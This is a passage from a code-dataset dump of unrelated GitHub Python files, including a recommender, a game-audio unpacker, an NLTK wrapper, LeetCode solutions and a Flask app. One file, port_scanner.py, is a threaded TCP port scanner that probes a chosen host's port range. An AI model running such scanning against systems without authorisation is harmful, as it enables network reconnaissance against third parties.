image.save(yolo_url)\n #sess.close()\n return yolo_url\n","repo_name":"MitsuhiroIto/Flask_AI","sub_path":"models/yolo_detection.py","file_name":"yolo_detection.py","file_ext":"py","file_size_in_byte":5091,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"18501442584","text":"config = {\n # 标签 -> 物体名\n 'label_2_name' : {\n 0: '无垃圾',\n 1: '烟头',\n 2: '砖头',\n 3: '瓶子',\n 4: '土豆',\n 5: '香蕉',\n 6: '娃娃菜',\n 7: '陶瓷',\n 8: '电池',\n 9: '苹果',\n 10:'易拉罐'\n },\n\n # 各类垃圾标签\n 'label_list': {\n 'none':[0],\n 'harmful':[8],\n 'recycle': [6,10],\n 'kitchen': [3,4,5,9],\n 'others': [1,2,7],\n },\n\n 'video_path':'./video/demo.mp4', # 宣传视频路径\n 'usart': '/dev/ttyTHS1', # 串口名称\n 'model_path': './model/resnet18_fine_tune_49.pth', # 模型路径\n}\n","repo_name":"zhilangtaosha/AI-Trash","sub_path":"app/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"12040070801","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nnot predict the rating score, so hard to make heavy use of AlgoBase class\r\n\"\"\"\r\n\r\nfrom MovieLens import MovieLens\r\nfrom surprise import KNNBasic\r\nimport heapq\r\nfrom collections import defaultdict\r\nfrom operator import itemgetter\r\nimport MyDump\r\n\r\n\r\ntestSubject = '85' # raw userId\r\nk = 10\r\n\r\n# Load our data set and compute the user similarity matrix\r\nml = None\r\ndata = None\r\nml, data, _ = MyDump.LoadMovieLensData(True)\r\nif ml == None or data == None:\r\n ml = MovieLens()\r\n data = ml.loadMovieLensLatestSmall()\r\n\r\nprint(f'testUser {testSubject}, the ratings are:')\r\nfor (movieID, rating) in sorted(ml.getUserRatings(int(testSubject)), key=lambda x: x[1], reverse = True):\r\n print(f'\\t{ml.movieID_to_name[movieID]}\\t:{rating}')\r\n\r\n\r\n\r\ntrainSet = data.build_full_trainset()\r\n\r\nsim_options = {'name': 'cosine',\r\n 'user_based': True\r\n }\r\n\r\nsimsMatrix = None\r\n_,_,simsMatrix = MyDump.Load('user_similarity',1)\r\nif simsMatrix is None:\r\n\r\n model = KNNBasic(sim_options=sim_options)\r\n model.fit(trainSet) # calculate the similarity\r\n simsMatrix = model.compute_similarities()\r\n\r\n MyDump.Save('user_similarity', data = simsMatrix, verbose = 1)\r\n\r\n\r\n# Get top N similar users to our test subject\r\n# (Alternate approach would be to select users up to some similarity threshold - try it!)\r\ntestUserInnerID = 
trainSet.to_inner_uid(testSubject)\r\nsimilarityRow = simsMatrix[testUserInnerID]\r\n\r\nsimilarUsers = []\r\nfor innerID, score in enumerate(similarityRow):\r\n if (innerID != testUserInnerID):\r\n similarUsers.append( (innerID, score) )\r\n\r\n\r\n# kNeighbors = heapq.nlargest(k, similarUsers, key=lambda t: t[1])\r\n# Inception (2010) 3.3\r\n# Star Wars: Episode V - The Empire Strikes Back (1980) 2.4\r\n# Bourne Identity, The (1988) 2.0\r\n# Crouching Tiger, Hidden Dragon (Wo hu cang long) (2000) 2.0\r\n# Dark Knight, The (2008) 2.0\r\n# Good, the Bad and the Ugly, The (Buono, il brutto, il cattivo, Il) (1966) 1.9\r\n# Departed, The (2006) 1.9\r\n# Dark Knight Rises, The (2012) 1.9\r\n# Back to the Future (1985) 1.9\r\n# Gravity (2013) 1.8\r\n# Fight Club (1999) 1.8\r\n\r\n# get similar users by threshold\r\nkNeighbors = []\r\nfor rating in similarUsers:\r\n if rating[1] > 0.95:\r\n kNeighbors.append(rating)\r\n# Star Wars: Episode IV - A New Hope (1977) 114.57068319140309\r\n# Matrix, The (1999) 107.72095292088618\r\n# Star Wars: Episode V - The Empire Strikes Back (1980) 88.09116645357186\r\n# Fight Club (1999) 79.26558201621258\r\n# Back to the Future (1985) 78.78807368067915\r\n# Raiders of the Lost Ark (Indiana Jones and the Raiders of the Lost Ark) (1981) 78.77028125945898\r\n# American Beauty (1999) 77.32300806156537\r\n# Toy Story (1995) 76.37713266677879\r\n# Godfather, The (1972) 76.21072562503657\r\n# Star Wars: Episode VI - Return of the Jedi (1983) 74.71908773556109\r\n# Lord of the Rings: The Fellowship of the Ring, The (2001) 74.37234120218191\r\n\r\n\r\n# Get the stuff they rated, and add up ratings for each item, weighted by user similarity\r\ncandidates = defaultdict(float)\r\nfor similarUser in kNeighbors:\r\n innerID = similarUser[0]\r\n userSimilarityScore = similarUser[1]\r\n theirRatings = trainSet.ur[innerID]\r\n for rating in theirRatings:\r\n candidates[rating[0]] += (rating[1] / 5.0) * userSimilarityScore\r\n\r\n# Build a dictionary of stuff the user has already seen\r\nwatched = {}\r\nfor itemID, rating in trainSet.ur[testUserInnerID]:\r\n watched[itemID] = 1\r\n\r\n# Get top-rated items from similar users:\r\npos = 0\r\nfor itemID, ratingSum in sorted(candidates.items(), key=itemgetter(1), reverse=True):\r\n if not itemID in watched:\r\n movieID = trainSet.to_raw_iid(itemID)\r\n print(ml.getMovieName(int(movieID)), ratingSum)\r\n pos += 1\r\n if (pos > 10):\r\n break\r\n","repo_name":"yuanpaner/Recommender_prj","sub_path":"UserCF.py","file_name":"UserCF.py","file_ext":"py","file_size_in_byte":3777,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"6444913766","text":"from lxml import etree as ET\n\ndef background(iterationvalue):\n colours = {0: 'white', 1:'lightblue'}\n return colours.get(iterationvalue % 2)\n\n\ndocument = open('arkiverad_kanal.xml', encoding='utf-8')\ntree = ET.parse(document)\niteration = 0\n\nposts = tree.findall('/post')\nsortingdict = {}\nhtml_document = open('insta.html', 'w', encoding=\"utf8\")\nhtml_document.write('\\n\\n\\n')\nhtml_document.write('\\n\\n\\n
')\n\n\n\nfor post in posts:\n    datum = post.find('metadata/publishDate')\n    sortingdict.update({datum.text: post})\n\nfor k,v in sorted(sortingdict.items(),reverse=True):\n    html_document.write(f'\\n')\n    publish_date = v.find('metadata/publishDate')\n    post_title = v.find('metadata/title')\n    post_message = v.find('metadata/postMessage')\n    share_title = v.find('resources/share/title')\n    share_description = v.find('resources/share/description')\n    resources = v.findall('resources/file')\n    comments = v.findall('comments/comment')\n    likes = v.find('metadata/likeCount')\n    shares = v.find('metadata/shareCount')\n\n    if resources is not None:\n        for resorce in resources:\n            print(resorce.attrib['name'])\n            link = resorce.attrib['name']\n            if link.endswith('.mp4'):\n                html_document.write(f'\\n')\n            else:\n                html_document.write(f'\"picture\"\\n')\n\n    dateslice = publish_date.text.split('T')\n    dateyear = dateslice[0]\n    datetime = dateslice[1].split('.')[0]\n    print(datetime)\n    html_document.write(f'{dateyear} {datetime}\\n')\n    iteration += 1\n    if post_message is not None:\n        #html_document.write(f'{post_title.text}')\n        html_document.write(f'{post_message.text}')\n    if share_description is not None:\n        html_document.write(f'{share_title.text}')\n        html_document.write(f'{share_description.text}')\n\n    if (shares is not None) and (likes is not None):\n        html_document.write(f'Likes: {likes.text} Delningar: {shares.text}')\n\n    if comments is not None:\n        for comment in comments:\n            comment_message = comment.find('message')\n            comment_author = comment.find('author')\n            comment_create_time = comment.find('createTime')\n            comment_dateslice = publish_date.text.split('T')\n            comment_dateyear = comment_dateslice[0]\n            comment_datetime = comment_dateslice[1].split('.')[0]\n\n            html_document.write(f'\\n{comment_dateyear} {comment_datetime}\\n{comment_author.text} - {comment_message.text}\\n')\n\n\n    html_document.write('\\n')\n\nhtml_document.write('
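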
')\n\n\n\n\n","repo_name":"Viktor-Lundberg/Eplicta_archive_API","sub_path":"Generate_html.py","file_name":"Generate_html.py","file_ext":"py","file_size_in_byte":3418,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"14406614290","text":"import json\nimport logging\nimport pathlib\nimport subprocess\nimport threading\nimport zipfile\n\nimport tqdm\n\nfrom gfunpack import utils\n\n_logger = logging.getLogger('gfunpack.utils')\n_warning = _logger.warning\n\n\ndef _test_vgmstream():\n try:\n subprocess.run([\n 'vgmstream-cli',\n '-V',\n ], stdout=subprocess.DEVNULL)\n except FileNotFoundError:\n raise FileNotFoundError('vgmstream-cli is required to unpack sound files')\n\n\ndef _extract_zip(path: pathlib.Path, directory: pathlib.Path, force: bool = False):\n with zipfile.ZipFile(path) as z:\n extracted: list[pathlib.Path] = []\n for file in z.filelist:\n output = directory.joinpath(file.filename)\n if force or not (\n output.is_file() # *.acb.bytes\n or output.with_suffix('').is_file() # *.acb\n or output.with_suffix('').with_suffix('.wav').is_file() # *.wav\n or output.with_suffix('').with_suffix('.m4a').is_file() # *.m4a\n ):\n z.extract(file, directory)\n extracted.append(output)\n return extracted\n\n\ndef _test_ffmpeg():\n try:\n subprocess.run([\n 'ffmpeg',\n '-h',\n ], stdout=subprocess.DEVNULL).check_returncode()\n except FileNotFoundError:\n raise FileNotFoundError('ffmpeg is required to transcode audio files')\n \n\ndef _transcode_files(files: list[pathlib.Path], force: bool, concurrency: int, clean: bool,\n bar: tqdm.tqdm | None = None):\n semaphore = threading.Semaphore(concurrency)\n def transcode(file: pathlib.Path, output: pathlib.Path):\n nonlocal clean, force, semaphore\n if force or not output.is_file():\n subprocess.run([\n 'ffmpeg',\n '-hide_banner',\n '-loglevel',\n 'error',\n '-i',\n file,\n output,\n ]).check_returncode()\n if clean:\n file.unlink()\n semaphore.release()\n\n converted: dict[str, pathlib.Path] = {}\n for file in files:\n semaphore.acquire()\n output = file.with_suffix('.m4a')\n threading.Thread(target=transcode, args=(file, output)).start()\n converted[file.stem] = output\n if bar:\n bar.update()\n\n for _ in range(concurrency):\n semaphore.acquire()\n return converted\n\n\ndef _extract_acb_to_wav(dat: pathlib.Path, destination: pathlib.Path,\n semaphore: threading.Semaphore | None = None,\n force: bool = False,\n clean: bool = True):\n acb_audios = _extract_zip(dat, destination, force=force)\n assert len(acb_audios) <= 1\n if len(acb_audios) == 1:\n acb = acb_audios[0]\n assert acb.suffix == '.bytes'\n acb = acb.rename(acb.with_suffix(''))\n subprocess.run([\n 'vgmstream-cli',\n acb,\n '-o',\n destination.joinpath('?n.wav'),\n '-S',\n '0',\n ], stdout=subprocess.DEVNULL).check_returncode()\n if clean:\n acb.unlink()\n else:\n acb = None\n if semaphore is not None:\n semaphore.release()\n return acb\n\n\nclass BGM:\n directory: pathlib.Path\n\n destination: pathlib.Path\n\n se_destination: pathlib.Path\n\n resource_files: list[pathlib.Path]\n\n se_resource_file: pathlib.Path\n\n extracted: dict[str, pathlib.Path]\n\n force: bool\n\n concurrency: int\n\n clean: bool\n\n def __init__(self, directory: str, destination: str,\n force: bool = False, concurrency: int = 8, clean: bool = True) -> None:\n self.directory = utils.check_directory(directory)\n self.destination = utils.check_directory(pathlib.Path(destination).joinpath('bgm'), create=True)\n self.se_destination = 
utils.check_directory(pathlib.Path(destination).joinpath('se'), create=True)\n self.force = force\n self.concurrency = concurrency\n self.clean = clean\n self.resource_files = list(f for f in self.directory.glob('*acb3030.dat') if 'AVGacb3030' not in f.stem)\n self.se_resource_file = list(self.directory.glob('*AVGacb3030.dat'))[0]\n _test_ffmpeg()\n self.extracted = self.extract_and_convert()\n\n def extract_all(self, resource_files: list[pathlib.Path]):\n _test_vgmstream()\n semaphore = threading.Semaphore(self.concurrency)\n for file in resource_files:\n semaphore.acquire()\n threading.Thread(\n target=_extract_acb_to_wav,\n args=(file, self.destination, semaphore, self.force, self.clean),\n ).start()\n for _ in range(self.concurrency):\n semaphore.acquire()\n return list(self.destination.glob('*.wav'))\n\n def _get_audio_template(self):\n content = utils.read_text_asset(list(self.directory.glob('*assettextes.ab'))[0], 'assets/resources/textdata/audiotemplate.txt')\n mapping: dict[str, str] = {}\n for line in (l.strip() for l in content.split('\\n')):\n if '//' in line:\n comment_index = line.index('//')\n line = line[:comment_index].strip()\n if line == '' or '|' not in line:\n continue\n fields = line.split('|')\n assert len(fields) >= 4 or (len(fields) == 3 and fields[1] in [\n 'Skip',\n 'UI_dsExstart',\n 'UI_dsMissionStart',\n 'UI_dsenemy',\n 'UI_dsLogin',\n 'BGM_PAUSE',\n 'BGM_UNPAUSE',\n ]), line\n name, file = fields[1:3]\n mapping[name] = file\n return mapping\n\n def extract_and_convert(self):\n _extract_acb_to_wav(self.se_resource_file, self.se_destination, None, self.force, self.clean)\n files = _transcode_files(\n list(self.se_destination.glob('*.wav')),\n self.force,\n self.concurrency,\n self.clean,\n )\n bar = tqdm.tqdm(total=len(self.resource_files))\n batch_count = min(self.concurrency * 8, 32) if self.clean else len(self.resource_files)\n for i in range(0, len(self.resource_files), batch_count):\n batch = self.resource_files[i : i + batch_count]\n files.update(_transcode_files(\n self.extract_all(batch),\n self.force,\n self.concurrency,\n self.clean,\n bar,\n ))\n bar.close()\n files.update((existing.stem, existing) for existing in self.destination.glob('*.m4a'))\n files.update((existing.stem, existing) for existing in self.se_destination.glob('*.m4a'))\n\n name_mapping = self._get_audio_template()\n mapping: dict[str, pathlib.Path] = {}\n for name, audio_name in name_mapping.items():\n if audio_name in files:\n mapping[name] = files[audio_name].relative_to(self.destination.parent)\n elif name in files:\n mapping[name] = files[name].relative_to(self.destination.parent)\n else:\n _warning('audio identifier %s not found', name)\n mapped_files = set(mapping.values())\n for audio_name, file in files.items():\n path = file.relative_to(self.destination.parent)\n if path not in mapped_files:\n mapping[audio_name] = path\n return mapping\n\n def save(self):\n path = self.destination.parent.joinpath('audio.json')\n with path.open('w') as f:\n f.write(json.dumps(dict((k, str(v)) for k, v in self.extracted.items()), indent=2, ensure_ascii=False))\n return path\n","repo_name":"gudzpoz/gfStory","sub_path":"unpack/src/gfunpack/audio.py","file_name":"audio.py","file_ext":"py","file_size_in_byte":7767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30399699937","text":"import json\nimport os\nimport tempfile\nimport warnings\nfrom subprocess import PIPE\n\nfrom nltk.internals import (\n _java_options,\n config_java,\n 
find_dir,\n find_file,\n find_jar,\n java,\n)\nfrom nltk.tokenize.api import TokenizerI\n\n_stanford_url = \"https://nlp.stanford.edu/software\"\n\n\nclass StanfordSegmenter(TokenizerI):\n \"\"\"Interface to the Stanford Segmenter\n\n If stanford-segmenter version is older than 2016-10-31, then path_to_slf4j\n should be provieded, for example::\n\n seg = StanfordSegmenter(path_to_slf4j='/YOUR_PATH/slf4j-api.jar')\n\n >>> from nltk.tokenize.stanford_segmenter import StanfordSegmenter\n >>> seg = StanfordSegmenter() # doctest: +SKIP\n >>> seg.default_config('zh') # doctest: +SKIP\n >>> sent = u'这是斯坦福中文分词器测试'\n >>> print(seg.segment(sent)) # doctest: +SKIP\n \\u8fd9 \\u662f \\u65af\\u5766\\u798f \\u4e2d\\u6587 \\u5206\\u8bcd\\u5668 \\u6d4b\\u8bd5\n \n >>> seg.default_config('ar') # doctest: +SKIP\n >>> sent = u'هذا هو تصنيف ستانفورد العربي للكلمات'\n >>> print(seg.segment(sent.split())) # doctest: +SKIP\n \\u0647\\u0630\\u0627 \\u0647\\u0648 \\u062a\\u0635\\u0646\\u064a\\u0641 \\u0633\\u062a\\u0627\\u0646\\u0641\\u0648\\u0631\\u062f \\u0627\\u0644\\u0639\\u0631\\u0628\\u064a \\u0644 \\u0627\\u0644\\u0643\\u0644\\u0645\\u0627\\u062a\n \n \"\"\"\n\n _JAR = \"stanford-segmenter.jar\"\n\n def __init__(\n self,\n path_to_jar=None,\n path_to_slf4j=None,\n java_class=None,\n path_to_model=None,\n path_to_dict=None,\n path_to_sihan_corpora_dict=None,\n sihan_post_processing=\"false\",\n keep_whitespaces=\"false\",\n encoding=\"UTF-8\",\n options=None,\n verbose=False,\n java_options=\"-mx2g\",\n ):\n # Raise deprecation warning.\n warnings.simplefilter(\"always\", DeprecationWarning)\n warnings.warn(\n str(\n \"\\nThe StanfordTokenizer will \"\n \"be deprecated in version 3.2.5.\\n\"\n \"Please use \\033[91mnltk.parse.corenlp.CoreNLPTokenizer\\033[0m instead.'\"\n ),\n DeprecationWarning,\n stacklevel=2,\n )\n warnings.simplefilter(\"ignore\", DeprecationWarning)\n\n stanford_segmenter = find_jar(\n self._JAR,\n path_to_jar,\n env_vars=(\"STANFORD_SEGMENTER\",),\n searchpath=(),\n url=_stanford_url,\n verbose=verbose,\n )\n if path_to_slf4j is not None:\n slf4j = find_jar(\n \"slf4j-api.jar\",\n path_to_slf4j,\n env_vars=(\"SLF4J\", \"STANFORD_SEGMENTER\"),\n searchpath=(),\n url=_stanford_url,\n verbose=verbose,\n )\n else:\n slf4j = None\n\n # This is passed to java as the -cp option, the old version of segmenter needs slf4j.\n # The new version of stanford-segmenter-2016-10-31 doesn't need slf4j\n self._stanford_jar = os.pathsep.join(\n _ for _ in [stanford_segmenter, slf4j] if _ is not None\n )\n\n self._java_class = java_class\n self._model = path_to_model\n self._sihan_corpora_dict = path_to_sihan_corpora_dict\n self._sihan_post_processing = sihan_post_processing\n self._keep_whitespaces = keep_whitespaces\n self._dict = path_to_dict\n\n self._encoding = encoding\n self.java_options = java_options\n options = {} if options is None else options\n self._options_cmd = \",\".join(\n f\"{key}={json.dumps(val)}\" for key, val in options.items()\n )\n\n def default_config(self, lang):\n \"\"\"\n Attempt to initialize Stanford Word Segmenter for the specified language\n using the STANFORD_SEGMENTER and STANFORD_MODELS environment variables\n \"\"\"\n\n search_path = ()\n if os.environ.get(\"STANFORD_SEGMENTER\"):\n search_path = {os.path.join(os.environ.get(\"STANFORD_SEGMENTER\"), \"data\")}\n\n # init for Chinese-specific files\n self._dict = None\n self._sihan_corpora_dict = None\n self._sihan_post_processing = \"false\"\n\n if lang == \"ar\":\n self._java_class = (\n 
\"edu.stanford.nlp.international.arabic.process.ArabicSegmenter\"\n )\n model = \"arabic-segmenter-atb+bn+arztrain.ser.gz\"\n\n elif lang == \"zh\":\n self._java_class = \"edu.stanford.nlp.ie.crf.CRFClassifier\"\n model = \"pku.gz\"\n self._sihan_post_processing = \"true\"\n\n path_to_dict = \"dict-chris6.ser.gz\"\n try:\n self._dict = find_file(\n path_to_dict,\n searchpath=search_path,\n url=_stanford_url,\n verbose=False,\n env_vars=(\"STANFORD_MODELS\",),\n )\n except LookupError as e:\n raise LookupError(\n \"Could not find '%s' (tried using env. \"\n \"variables STANFORD_MODELS and /data/)\"\n % path_to_dict\n ) from e\n\n sihan_dir = \"./data/\"\n try:\n path_to_sihan_dir = find_dir(\n sihan_dir,\n url=_stanford_url,\n verbose=False,\n env_vars=(\"STANFORD_SEGMENTER\",),\n )\n self._sihan_corpora_dict = os.path.join(path_to_sihan_dir, sihan_dir)\n except LookupError as e:\n raise LookupError(\n \"Could not find '%s' (tried using the \"\n \"STANFORD_SEGMENTER environment variable)\" % sihan_dir\n ) from e\n else:\n raise LookupError(f\"Unsupported language {lang}\")\n\n try:\n self._model = find_file(\n model,\n searchpath=search_path,\n url=_stanford_url,\n verbose=False,\n env_vars=(\"STANFORD_MODELS\", \"STANFORD_SEGMENTER\"),\n )\n except LookupError as e:\n raise LookupError(\n \"Could not find '%s' (tried using env. \"\n \"variables STANFORD_MODELS and /data/)\" % model\n ) from e\n\n def tokenize(self, s):\n super().tokenize(s)\n\n def segment_file(self, input_file_path):\n \"\"\" \"\"\"\n cmd = [\n self._java_class,\n \"-loadClassifier\",\n self._model,\n \"-keepAllWhitespaces\",\n self._keep_whitespaces,\n \"-textFile\",\n input_file_path,\n ]\n if self._sihan_corpora_dict is not None:\n cmd.extend(\n [\n \"-serDictionary\",\n self._dict,\n \"-sighanCorporaDict\",\n self._sihan_corpora_dict,\n \"-sighanPostProcessing\",\n self._sihan_post_processing,\n ]\n )\n\n stdout = self._execute(cmd)\n\n return stdout\n\n def segment(self, tokens):\n return self.segment_sents([tokens])\n\n def segment_sents(self, sentences):\n \"\"\" \"\"\"\n encoding = self._encoding\n # Create a temporary input file\n _input_fh, self._input_file_path = tempfile.mkstemp(text=True)\n\n # Write the actural sentences to the temporary input file\n _input_fh = os.fdopen(_input_fh, \"wb\")\n _input = \"\\n\".join(\" \".join(x) for x in sentences)\n if isinstance(_input, str) and encoding:\n _input = _input.encode(encoding)\n _input_fh.write(_input)\n _input_fh.close()\n\n cmd = [\n self._java_class,\n \"-loadClassifier\",\n self._model,\n \"-keepAllWhitespaces\",\n self._keep_whitespaces,\n \"-textFile\",\n self._input_file_path,\n ]\n if self._sihan_corpora_dict is not None:\n cmd.extend(\n [\n \"-serDictionary\",\n self._dict,\n \"-sighanCorporaDict\",\n self._sihan_corpora_dict,\n \"-sighanPostProcessing\",\n self._sihan_post_processing,\n ]\n )\n\n stdout = self._execute(cmd)\n\n # Delete the temporary file\n os.unlink(self._input_file_path)\n\n return stdout\n\n def _execute(self, cmd, verbose=False):\n encoding = self._encoding\n cmd.extend([\"-inputEncoding\", encoding])\n _options_cmd = self._options_cmd\n if _options_cmd:\n cmd.extend([\"-options\", self._options_cmd])\n\n default_options = \" \".join(_java_options)\n\n # Configure java.\n config_java(options=self.java_options, verbose=verbose)\n\n stdout, _stderr = java(\n cmd, classpath=self._stanford_jar, stdout=PIPE, stderr=PIPE\n )\n stdout = stdout.decode(encoding)\n\n # Return java configurations to their default values.\n 
config_java(options=default_options, verbose=False)\n\n return stdout\n","repo_name":"nltk/nltk","sub_path":"nltk/tokenize/stanford_segmenter.py","file_name":"stanford_segmenter.py","file_ext":"py","file_size_in_byte":9196,"program_lang":"python","lang":"en","doc_type":"code","stars":12541,"dataset":"github-code","pt":"75"} +{"seq_id":"22005565777","text":"# Given an array of integers, find two numbers such that they add up to a specific target number\n'''\nThe function should return indices of the two numbers where index1 must be less than index2\nInput: numbers={2, 7, 11, 15}, target=9\nOutput: index1=1, index2=2\nNote that the array index starts from 1 instead of 0\n'''\n\nclass Item:\n def __init__(self, value, index):\n self.value = value\n self.index = index\n\ndef twoSum(num, target):\n len_num = len(num)\n if 0 == len_num:\n return (-1, -1)\n\n items = [Item(value, 0) for value in num]\n for i in range(0, len_num):\n items[i].index = i + 1\n items.sort(lambda x, y: cmp(x.value, y.value))\n index1 = 0\n index2 = len_num - 1\n is_find = False\n while index1 < index2:\n total = items[index1].value + items[index2].value\n if total < target:\n index1 += 1\n elif total > target:\n index2 -= 1\n else:\n is_find = True\n break\n (index1, index2) = (index1, index2) if items[index1].index <= items[index2].index else (index2, index1)\n return (items[index1].index, items[index2].index) if is_find else (-1, -1)\n\nnumbers = [2, 7, 11, 15]\ntarget = 9\ntwoSum(numbers, target)\n\n","repo_name":"helen5haha/pylee","sub_path":"number/TwoSum.py","file_name":"TwoSum.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28594979094","text":"from flask import Flask, render_template, request\r\nfrom script import predict_price\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef home():\r\n return render_template('index1.html')\r\n\r\n@app.route('/form', methods=[\"GET\",\"POST\"])\r\ndef form():\r\n if request.method == \"POST\":\r\n loc = request.form.get(\"location\")\r\n sqft = request.form.get(\"sqft\")\r\n bath = request.form.get(\"bath\")\r\n bhk = request.form.get(\"bhk\")\r\n x = predict_price(loc, int(sqft), int(bath), int(bhk))\r\n x=list(str(x))\r\n s=x[:5]\r\n r=\"\".join(s)\r\n return render_template('index1.html', ans=r)\r\n\r\napp.run(debug=True)","repo_name":"jaisaishankar16/Real-Estate","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29608756547","text":"class Solution:\n def maximumTop(self, nums: List[int], k: int) -> int:\n n = len(nums)\n if n == 1 and k % 2 == 1:\n return -1\n elif n == 1:\n return nums[0]\n\n big = nums.copy()\n for i in range(1, n):\n big[i] = max(big[i], big[i - 1])\n\n if k > n:\n return big[n - 1]\n if k == n:\n return big[n - 2]\n if k == 0:\n return nums[0]\n if k == 1:\n return nums[1]\n\n # 结果一定是0 - n-2的最大项或者n项\n return max(big[k - 2], nums[k])","repo_name":"CA2528357431/leetcode-note","sub_path":"LIST2/0606 2202.py","file_name":"0606 2202.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"10113274910","text":"import socket \nimport sys \nimport time \nimport threading \nuser_input = \"YOU NEED TO ENTER:::python3 port_scan.py target start_port end_port\" \n \nprint(\"*\"*60) \nprint(\"python simple port 
sacnner\") \nprint(\"*\"*60) \n \nif(len(sys.argv))!=4: \n print(user_input) \n sys.exit() \n \ntry: \n target = socket.gethostbyname(sys.argv[1]) \nexcept socket.gaierror: \n print(\"Name Resolution error\") \n sys.exit() \nstart_port = int(sys.argv[2]) \nend_port = int(sys.argv[3]) \n \nprint(\"scanning target:\",target) \ndef scan_port(port): \n print(\"scanning port:\",port) \n server = socket.socket(socket.AF_INET , socket.SOCK_STREAM) \n server.settimeout(2) \n conn = server.connect_ex((target,port)) #is there any error occure that port will terminate then continue to another port \n if conn == 0: \n print(\"port {} is OPEN\",format(port)) \n server.close() \n \nfor port in range(start_port , end_port+1): \n thread = threading.Thread (target = scan_port , args = (port,)).start() \n #thread.start()\n","repo_name":"MNaresh010/port_scanner","sub_path":"port_scanner.py","file_name":"port_scanner.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"14181792311","text":"'''\nstack simulation\nT: O(M + N)\nS: O(M + N)\n\n执行用时:40 ms, 在所有 Python3 提交中击败了35.63% 的用户\n内存消耗:14.9 MB, 在所有 Python3 提交中击败了89.34% 的用户\n通过测试用例:114 / 114\n'''\nclass Solution:\n def backspaceCompare(self, s: str, t: str) -> bool:\n\n def simulate(u):\n uu = []\n for ch in u:\n if ch == '#':\n if uu:\n uu.pop()\n else:\n uu.append(ch)\n return uu\n\n return simulate(s) == simulate(t)\n\n\n'''\nstack simulation\nT: O(M + N)\nS: O(M + N)\n\n执行用时:36 ms, 在所有 Python3 提交中击败了63.49% 的用户\n内存消耗:14.9 MB, 在所有 Python3 提交中击败了85.91% 的用户\n通过测试用例:114 / 114\n'''\nclass Solution:\n def backspaceCompare(self, s: str, t: str) -> bool:\n def build(u):\n uu = []\n for ch in u:\n if ch != '#':\n uu.append(ch)\n elif uu:\n uu.pop()\n return ''.join(uu)\n\n return build(s) == build(t)\n\n\n'''\ntwo pointers, 倒序 skip\nT: O(M + N), S: O(1)\n\n感想:\n代码写得多了,自然而然就想着复用。比如,这里把 s 和 t 同用一个函数处理。\n同时,主函数中 while 中采用 or 避免了退出 while 之后的再次讨论。\n\n执行用时:40 ms, 在所有 Python3 提交中击败了35.63% 的用户\n内存消耗:14.9 MB, 在所有 Python3 提交中击败了76.25% 的用户\n通过测试用例:114 / 114\n'''\nclass Solution:\n def backspaceCompare(self, s: str, t: str) -> bool:\n ns, nt = len(s), len(t)\n i, j = ns - 1, nt - 1\n\n def findValidLetter(st, ij):\n skip = 0\n while ij >= 0:\n if st[ij] == '#':\n skip += 1\n elif skip:\n skip -= 1\n else:\n return st[ij], ij - 1\n ij -= 1\n return None, -1\n\n while i >= 0 or j >= 0:\n # find each valid letter in s and t from the end to beginning\n valid_ss, i = findValidLetter(s, i) \n valid_tt, j = findValidLetter(t, j)\n if valid_ss != valid_tt:\n return False\n\n return True\n\n\n","repo_name":"lixiang2017/leetcode","sub_path":"leetcode-cn/0844.0_Backspace_String_Compare.py","file_name":"0844.0_Backspace_String_Compare.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"24868306891","text":"# Source: https://www.youtube.com/watch?v=LPFhl65R7ww\r\n\r\n\r\ndef median_sorted(num1, num2):\r\n maxValue, minValue = float('inf'), float('-inf')\r\n n1, n2 = len(num1), len(num2)\r\n low, high = 0, n1-1\r\n\r\n while low <= high:\r\n partitionX = low + (high-low)//2\r\n partitionY = (n1 + n2 + 1)//2 - partitionX\r\n\r\n maxLeftX = num1[partitionX-1] if partitionX else minValue\r\n minRightX = num1[partitionX] if partitionX else maxValue\r\n maxLeftY = num2[partitionY-1] if partitionY else minValue\r\n minRightY = num2[partitionY] if partitionY else maxValue\r\n\r\n if maxLeftX <= 
minRightY and maxLeftY <= minRightX:\r\n if not (n1 + n2) % 2:\r\n return (max(maxLeftX, maxLeftY) + min(minRightX, minRightY))/2\r\n else:\r\n return max(maxLeftX, maxLeftY)\r\n elif maxLeftX > minRightY:\r\n high = partitionX - 1\r\n else:\r\n low = partitionX + 1\r\n return -1\r\n\r\nif __name__ == '__main__':\r\n print (median_sorted([1, 3, 8, 9, 15], [7, 11, 18, 19, 21, 25])) # Time: O(Log(Min(M, N))), Space: O(1)\r\n","repo_name":"royadityak94/InterviewPrep","sub_path":"Grokking/Random/optimized_median_sorted_array.py","file_name":"optimized_median_sorted_array.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"34835604240","text":"\"\"\"kanimaji3\n\nConvert KanjiVG SVG into animated formats.\n\nUsage:\n kanimaji3 [-o FILE] [--format=FORMAT]\n kanimaji3 -h | --help\n kanimaji3 -V | --version\n\nOptions:\n -h --help Show this message.\n -V --version Show version.\n -o FILE --output=FILE Specify output file.\n --format=FORMAT Specify output format. [default: gif]\n\"\"\"\n\nfrom docopt import docopt, 